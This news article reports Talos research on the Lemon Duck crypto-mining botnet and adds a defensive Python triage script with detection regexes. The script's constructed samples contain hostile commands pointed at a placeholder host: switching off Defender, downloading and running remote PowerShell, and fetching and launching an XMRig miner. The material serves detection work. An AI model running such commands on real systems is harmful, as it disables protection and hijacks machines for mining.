A crypto-mining botnet known as Lemon Duck has shown increased activity since the end of August 2020, researchers from Cisco’s Talos team warned. The botnet, active since December 2018, uses a variety of techniques to spread across a network: infected RTF files sent by email, lateral movement with psexec and WMI, and SMB exploits including EternalBlue (MS17-010, against SMBv1) and SMBGhost (CVE-2020-0796, against the SMBv3 compression code in Windows 10 1903 and 1909). Both SMB flaws have had patches available since they were disclosed, so successful spread over them points to unpatched hosts.
“It is one of the more complex mining botnets with several interesting tricks up its sleeve. Although it has been documented before, we have recently seen a resurgence in the number of DNS requests connected with its command and control and mining servers,” the researchers wrote.
The observed requests originated mainly in Asia, with the top five countries being Iran, Egypt, the Philippines, Vietnam and India.
The end goal of the botnet is to steal computing resources to mine the Monero cryptocurrency with the open-source XMRig miner. To spread across a network, Lemon Duck uses 12 different infection vectors, ranging from plain copying over SMB shares to exploitation attempts against Redis and the Hadoop YARN ResourceManager (the cluster’s resource manager and job scheduler).
The infection starts with a PowerShell loading script that arrives from other infected systems over SMB, by email or on removable USB drives. That loader downloads a second PowerShell script containing a function named 'bpu', which downloads and executes the main PowerShell installer component. Along the way it disables Windows Defender real-time protection and checks whether it is running with administrative privileges: if so, the payload is downloaded and run in memory through the Invoke-Expression cmdlet; if not, it falls back to system executables already present on the host to launch the next stage. Both behaviours are noisy for a defender who is watching: Defender logs the loss of real-time protection itself (Event ID 5001), and with script block logging enabled the download-and-Invoke-Expression pattern lands in PowerShell Event ID 4104.
“The majority of Lemon Duck functionality is delivered as PowerShell scripts, with multiple levels of loaders which eventually install one or more cryptocurrency-mining payloads, the main spreading module, the Pyinstaller spreading module or the email-spreading module,” the researchers said.
The research team also provided details of a lesser-known Linux branch of Lemon Duck. Its bash scripts are executed after a Linux host has been compromised through Redis, YARN or SSH. There are two main bash scripts: one collects information about the infected host and attempts to download a Linux build of the XMRig miner, while the second is more complex and is focused on terminating and removing competing cryptocurrency miners already present on the system.
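The Windows loader chain and the Linux bash scripts described above are both behaviour a defender can look for in collected script content. The following is an added example, not Talos’ analysis code and not anything taken from a Lemon Duck sample: a small triage script that runs behavioural indicators over Windows PowerShell script-block text (as logged in Event ID 4104) and Linux shell command lines. The indicator names and regexes are this example’s own, derived only from the behaviour the article describes, the sample records are constructed for the demonstration, and the hosts in them use the 203.0.113.0/24 documentation range.

```python
"""Triage captured script content for Lemon Duck-style loader behaviour.

Added example; this is not Talos' analysis code nor anything taken from
a Lemon Duck sample. The indicator names and regexes are this example's
own, written from the behaviour described in the article, and SAMPLES
are constructed stand-ins for Windows PowerShell script-block logs
(Event ID 4104 ScriptBlockText) and Linux shell command lines. Hosts
use the 203.0.113.0/24 documentation range.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Record:
    platform: str  # "windows" or "linux"
    source: str    # where the text came from, for the report
    text: str      # the script block or command line


# Windows: the loader chain described in the article (Defender real-time
# protection switched off, admin check, download-and-Invoke-Expression,
# fallback to system executables).
WINDOWS_INDICATORS = [
    ("defender_realtime_off",
     re.compile(r"Set-MpPreference\s[^\n]*-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("admin_check",
     re.compile(r"WindowsPrincipal[\s\S]{0,200}?IsInRole[\s\S]{0,80}?Administrator", re.I)),
    ("download_and_iex",
     re.compile(r"(?:DownloadString|DownloadData|Invoke-WebRequest)[\s\S]{0,200}?(?:Invoke-Expression|\biex\b)"
                r"|(?:Invoke-Expression|\biex\b)[\s\S]{0,200}?(?:DownloadString|DownloadData)", re.I)),
    ("lolbin_launch",
     re.compile(r"\b(?:mshta|rundll32|regsvr32|wmic|schtasks)(?:\.exe)?\b", re.I)),
    ("encoded_command",
     re.compile(r"-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I)),
]

# Linux: the two bash scripts described in the article (host recon plus an
# XMRig download, then killing competing miners). Only "xmrig" is a name
# the article gives; the other process-name fragments are assumptions.
LINUX_INDICATORS = [
    ("host_recon", re.compile(r"uname\s+-a|\bnproc\b|\blscpu\b|/proc/cpuinfo")),
    ("miner_download", re.compile(r"(?:curl|wget)[^;|&\n]*(?:xmrig|miner)", re.I)),
    ("kill_competing_miners",
     re.compile(r"(?:pkill|killall)\s+(?:-\S+\s+)*\S*(?:xmr|miner)|xargs\s+kill\s+-9", re.I)),
    ("mining_pool_connect", re.compile(r"xmrig\b[^\n]*\s-o\s+\S+:\d{3,5}", re.I)),
    ("hidden_tmp_dir", re.compile(r"/tmp/\.\w")),
]

INDICATORS = {"windows": WINDOWS_INDICATORS, "linux": LINUX_INDICATORS}

# Either of these alone is worth an alert; otherwise require two indicators.
HIGH_CONFIDENCE = {"defender_realtime_off", "kill_competing_miners"}
MIN_HITS = 2


def match_indicators(rec: Record) -> list[str]:
    """Sorted names of every indicator whose regex fires on this record."""
    return sorted(name for name, rx in INDICATORS[rec.platform] if rx.search(rec.text))


def verdict(hits: list[str]) -> str:
    if not hits:
        return "clean"
    if len(hits) >= MIN_HITS or HIGH_CONFIDENCE & set(hits):
        return "suspicious"
    return "review"


def triage(records: list[Record]) -> list[tuple[str, str, list[str]]]:
    """(source, verdict, indicators) for each record."""
    out = []
    for rec in records:
        hits = match_indicators(rec)
        out.append((rec.source, verdict(hits), hits))
    return out


# Constructed sample records: one benign and one loader-like per platform.
SAMPLES = [
    Record("windows", "4104#1",
           r"Get-ChildItem C:\Windows\Temp | Where-Object { $_.Length -gt 1MB } | Remove-Item"),
    Record("windows", "4104#2", r"""Set-MpPreference -DisableRealtimeMonitoring $true
$p = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
if ($p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
  IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')
} else {
  mshta 'http://203.0.113.10/b.hta'
}"""),
    Record("linux", "bash#1",
           "tar czf /backup/etc-$(date +%F).tgz /etc && sha256sum /backup/*.tgz"),
    Record("linux", "bash#2",
           "nproc; uname -a; mkdir -p /tmp/.x; "
           "curl -fsSL http://203.0.113.10/xmrig.tar.gz -o /tmp/.x/xmrig.tar.gz; "
           "pkill -9 -f minerd; ps aux | grep -E 'xmr|mine' | grep -v grep | awk '{print $2}' | xargs kill -9; "
           "nohup /tmp/.x/xmrig -o 203.0.113.10:3333 >/dev/null 2>&1 &"),
]

if __name__ == "__main__":
    for source, result, hits in triage(SAMPLES):
        print(f"{source:<8} {result:<10} {', '.join(hits) or '-'}")
```

The point of scoring on combinations rather than single strings is that each indicator on its own has benign look-alikes (administrators do run schtasks, and operators do kill runaway processes), whereas switching off Defender real-time protection followed by a download fed straight into Invoke-Expression, or host recon followed by a miner download and a sweep that kills other miners, is the sequence the article describes and is rarely legitimate. Feed it real 4104 ScriptBlockText or auditd EXECVE reconstructions instead of the constructed SAMPLES to use it against your own logs.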
“Lemon Duck is a combination of code taken from open-source projects and code specifically crafted for the botnet. By combining the two, the author shows a moderate level of technical skills and understanding of security issues in Windows and various network protocols. This approach yields code that's more difficult to maintain, but the objectives can be achieved very quickly,” the researchers said.